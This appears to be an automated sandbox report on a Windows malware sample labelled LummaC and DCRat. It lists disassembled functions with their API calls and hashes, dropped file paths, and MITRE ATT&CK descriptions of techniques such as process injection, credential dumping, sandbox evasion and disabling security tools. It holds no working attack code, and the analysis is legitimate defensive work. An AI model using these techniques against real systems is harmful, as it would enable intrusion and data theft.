Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: ObjectRelease
String ID:
API String ID: 1429681911-3916222277
Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
Instruction ID: a17053831ab5985ca4e7d2b396e02726ed1114802680144c9dec6e5f975c5ae3
Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
Instruction Fuzzy Hash: 29314D75A0C75286EB04EF13B81862AB7A0F78AFD1F504835ED4A93B54DE3DE449CB00

Function 00007FF64D33E870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,?,?,00007FF64D34317F,?,?,00001000,00007FF64D32E51D), ref: 00007FF64D33E8BB
CreateSemaphoreW.KERNEL32(?,?,?,00007FF64D34317F,?,?,00001000,00007FF64D32E51D), ref: 00007FF64D33E8CB
CreateEventW.KERNEL32(?,?,?,00007FF64D34317F,?,?,00001000,00007FF64D32E51D), ref: 00007FF64D33E8E4

Strings

Thread pool initialization failed., xrefs: 00007FF64D33E900

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
Instruction ID: eca2f21293b1475b83d085ab22214c5d449e60b2cb0f5ff80a89fa8c43bdb6f4
Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
Instruction Fuzzy Hash: 9A21D232E1D64187F752BF24D4447AD72E2EB89B0CF188134CA0D8A695EF7E9845C780

Function 00007FF64D3485E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF64D3485EC
GetDeviceCaps.GDI32 ref: 00007FF64D3485FD
ReleaseDC.USER32 ref: 00007FF64D34860A

Strings

, xrefs: 00007FF64D348610

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: CapsDeviceRelease
String ID:
API String ID: 127614599-3916222277
Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
Instruction ID: 10910ecc888357227e6f4b0744b417ccd3cbc78f22f5e4b07bc98faccc7e4138
Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
Instruction Fuzzy Hash: 03E0C220F0C64282FF0877B6B58903AA2A1AB4DBD0F158435EA1FC3794EE3DC4C44300

Function 00007FF64D340548 Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF64D3405FC
SetLastError.KERNEL32 ref: 00007FF64D340697

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: e740716fb16c43b695f5f219d8f3a9084bf63b213528ce6e7a445183d4fb0460
Instruction ID: ef53c6b864b26565abec02cbd865316e54b058a8772cda29a953249106af5c5e
Opcode Fuzzy Hash: e740716fb16c43b695f5f219d8f3a9084bf63b213528ce6e7a445183d4fb0460
Instruction Fuzzy Hash: 7F51B072F18A4695FB01BB64D4452ECA361EB8ABD8F404232DA5C97BDAFE2CD544C340

Function 00007FF64D349D90 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF64D349DBC
GetLastError.KERNEL32 ref: 00007FF64D349E08
CreateDirectoryW.KERNEL32 ref: 00007FF64D349F10
LocalFree.KERNEL32 ref: 00007FF64D349F20

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
String ID:
API String ID: 1077098981-0
Opcode ID: b863cc91c4db730fc30b640aae8101ad1aab9759ecbd7d6557df89d0553ffb74
Instruction ID: e82647b3626504796c2977fc2872b1f837ed80a7474eef60a2394f1bd72f571b
Opcode Fuzzy Hash: b863cc91c4db730fc30b640aae8101ad1aab9759ecbd7d6557df89d0553ffb74
Instruction Fuzzy Hash: 32518332A1CB8286E751EF21E44436EB3B4FB86B88F501039EA4D97A54EF3DD504CB40

Function 00007FF64D348590 Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF64D348598
GetDeviceCaps.GDI32 ref: 00007FF64D3485AE
GetDeviceCaps.GDI32 ref: 00007FF64D3485C2
ReleaseDC.USER32 ref: 00007FF64D3485D3

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
Instruction ID: baed0ff54d9a1a9dcedf25346995f3a2dc735663f0327accd486a75aa486072f
Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
Instruction Fuzzy Hash: 77E012A0E0D70282FF1A7B726859136A1E1AF4A742F488439E81FD7350FE3DE085C710

Function 00007FF64D339638 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF64D3396EA

Part of subcall function 00007FF64D340F68: WideCharToMultiByte.KERNEL32 ref: 00007FF64D340F99

Strings

$%s, xrefs: 00007FF64D3396D7
@%s, xrefs: 00007FF64D3396CE

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: ByteCharMultiWide_snwprintf
String ID: $%s$@%s
API String ID: 2650857296-834177443
Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
Instruction ID: 0e603f56bc4279ae17722c5bf4e1e32a375b9ccce08c838110220f68e9cd7dd6
Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
Instruction Fuzzy Hash: 9631CF72F1DA4686EA22BF26E5402A9A3A0AB47788F401032DE0D97F95FE3CE515C700

Function 00007FF64D354078 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF64D351D3E), ref: 00007FF64D3540BC
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF64D351D3E), ref: 00007FF64D354102

Strings

csm, xrefs: 00007FF64D3540EF

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
Instruction ID: d970ab6db78b3e39bfa24e85686227f58e18a15c6b514ba91c9b698a71ebdc87
Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
Instruction Fuzzy Hash: EA112B32A08B4182EB66AB15E440269B7A1FB89B94F284231DF8D47754EF3CD555C700

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report bFZYRLnRIz.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: DCRat

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\SoftwareDistribution\Bypass.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\050YBm5Nq0

C:\Users\user\AppData\Local\Temp\0sKXUvZT9v

C:\Users\user\AppData\Local\Temp\0ueUesFUQH

C:\Users\user\AppData\Local\Temp\14WeqpTX45

C:\Users\user\AppData\Local\Temp\1bwHy2zxr4

Windows Analysis Report
bFZYRLnRIz.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre